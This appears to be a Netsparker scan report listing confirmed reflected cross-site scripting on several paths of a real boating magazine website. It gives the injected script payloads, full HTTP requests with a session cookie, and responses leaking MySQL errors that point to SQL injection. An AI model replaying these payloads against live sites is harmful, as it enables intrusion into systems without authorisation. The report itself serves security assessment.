class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Dig..
- /more/digital-publications

/more/digital-publications CONFIRMED

http://www.soundingsonline.com/more/digital-publications?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00223D)</script>

Request

GET /more/digital-publications?'"--></style></script><script>netsparker(0x00223D)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:34:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:34:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00223D)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00223D)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/more/digital-publications" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Subscribe to Soundings Magazine Digital Edition, Waterfront and Boats for Sale</title> <link href="/more/digital-publications?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/more/digital-publications?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_digital_publications"><!--
Type of page: category<br />Section: 14, s_uncategorized<br />Category: 86, c_uncategorized<br />Menu: 66, m_digital_publications-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&..
- /more/the-masters-series

/more/the-masters-series CONFIRMED

http://www.soundingsonline.com/more/the-masters-series?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00223C)</script>

Request

GET /more/the-masters-series?'"--></style></script><script>netsparker(0x00223C)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:34:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:34:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00223C)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00223C)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/more/the-masters-series" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Boating Questions, Buying a Boat and Boating Safety Publications | Soundings Online</title> <link href="/more/the-masters-series?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/more/the-masters-series?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_masters_series"><!--
Type of page: category<br />Section: 16, s_uncategorized<br />Category: 122, c_uncategorized<br />Menu: 122, m_masters_series-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=..
- /component/banners/click/

/component/banners/click/ CONFIRMED

http://www.soundingsonline.com/component/banners/click/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00227E)</script>

Request

GET /component/banners/click/?'"--></style></script><script>netsparker(0x00227E)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/component/banners/click/22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:35:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
